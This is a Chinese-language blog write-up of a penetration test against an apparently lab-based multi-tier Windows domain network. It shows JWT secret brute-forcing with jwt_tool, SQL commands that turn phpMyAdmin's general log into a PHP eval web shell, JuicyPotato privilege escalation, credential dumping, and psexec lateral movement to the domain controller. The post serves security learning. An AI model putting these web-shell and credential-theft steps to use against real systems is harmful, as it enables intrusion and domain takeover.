当一个的心中有更高的山峰想去攀登时,他就不会在意脚下的泥沼,他才可能用最平静的方式,去面对一般人难以承受的痛苦
前言
网络安全技术学习,承认⾃⼰的弱点不是丑事,只有对原理了然于⼼,才能突破更多的限制。
拥有快速学习能力的安全研究员,是不能有短板的,有的只能是大量的标准板和几块长板。
知识⾯,决定看到的攻击⾯有多⼴;知识链,决定发动的杀伤链有多深。
最终成果
最终收获的成果如下
网络拓扑图
本次实战绘制出来的网络拓扑图如下:
第三层:12server-web2
信息搜集
查看内网第三层网段存活的机器
arp -a
可以看到内网第二层网络还有一台xxx.xxx22.130机器存活
开代理访问12server-web2
通过12server-data1开代理访问12server-web2
cs服务器的地址和端口
信息搜集
代理端口扫描
目录扫描
访问
http://xxx.xxx22.130/a.php
目录扫描发现报错页面得知为phpstudy_pro
访问80端口的web服务
http://xxx.xxx22.130/
JWT爆破
登录请求中 , 在token中发现jwt认证
jwt的特征就是前两段是base64编码(去掉==),最后一段是秘钥,然后点号拼接
爆破工具 jwt_tool(github直接下载)工具
git clone https://github.com/ticarpi/jwt_tool.git
爆破的命令
python3 jwt_tool.py xxx -C -d xxx.txt
成功爆破出秘钥:
xxx is the CORRECT key!
JWT加解密
admin用户签名后的jwt
首先对浏览器代理进行配置
其次对burp进行配置
和浏览器代理同一配置
和代理同一配置
抓取数据包修改X-token
以admin身份登陆进去,之后发现后台什么都没有
phpmyadmin写日志拿shell
根据上面目录扫描的结果得出是phpstudypro,本地搭建测试安装phpmyadmin,找到默认路径phpmyadmin4.8.5
http://xxx.xxx22.130/phpmyadmin4.8.5
root和jwt跑出的key:xxx 登陆
利用phpmyadmin日志
show variables like '%general%';
SET GLOBAL general_log='on'; SHOW VARIABLES LIKE '%general%';
SET GLOBAL general_log_file='C:/phpStudy_pro/www/shell.php';
SELECT '<?php eval($_POST["cmd"]);?>'
写入一句话
蚁剑连接
地址:
http://xxx.xxx22.130/shell.php
密码:
cmd
ipconfig
查看内网发现很幸运还有其他网段
whoami
查看用户权限直接是administrator权限
上线cs
12server-data1设置中转监听
选择内网可以访问到的目标
生成木马,通过蚁剑上传到12server-web2,执行木马,成功上线cs
土豆提权
JuicyPotato (ms16-075)
提权成功
获取凭据
logonpasswords
获取凭据
查看凭据
破解凭据,得到本地管理员的账号密码:
远程连接
挂代理远程连接
成功连接
第四层:12server-data2
信息搜集
net view
查看目标
发现内网还有一台12server-data2和一台16server-dc1
查看域管
查看域控详细信息
查看域用户
获取域控NTML并进行解密
psexec进行横向
有域内机器的明文密码并且域域内机器是开放445端口的,所以可以尝试psexec进行横向。
使用cs自带插件
首先设置smb监听
从目标出发
选择内网可以访问到的目标
上线cs
成功上线cs
第四层:12server-dc1
psexec进行横向
有域控的明文密码并且域控是开放445端口的,所以可以尝试psexec进行横向。
选择内网可以访问到的目标
上线cs
成功上线cs
最终收获的成果如下
网络安全感悟
网络安全是一个长期的过程,因为网络安全没有终点,不管是网络安全企业,还是在网络安全行业各种不同方向的从业人员,不管你选择哪个方向,只有在这条路上坚持不懈,才能在这条路上走的更远,走的更好,不然你肯定走不远,迟早会转行或者被淘汰,把时间全浪费掉。
如果你觉得自己是真的热爱网络安全这个行业,坚持走下去就可以了,不用去管别人,现在就是一个大浪淘金的时代,淘下去的是沙子,留下来的才是金子,正所谓,千淘万漉虽辛苦,吹尽狂沙始到金,网络安全的路还很长,一生只做一件事,坚持做好一件事!
声明
文笔生疏,措辞浅薄,敬请各位大佬不吝赐教,万分感谢。
免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。
转载声明:平凡安全 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。
CSDN:
https://rdyx0.blog.csdn.net/
公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect
博客:
https://rdyx0.github.io/
先知社区:
https://xz.aliyun.com/u/37846
SecIN:
https://www.sec-in.com/author/3097
FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
扫一扫
1384
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
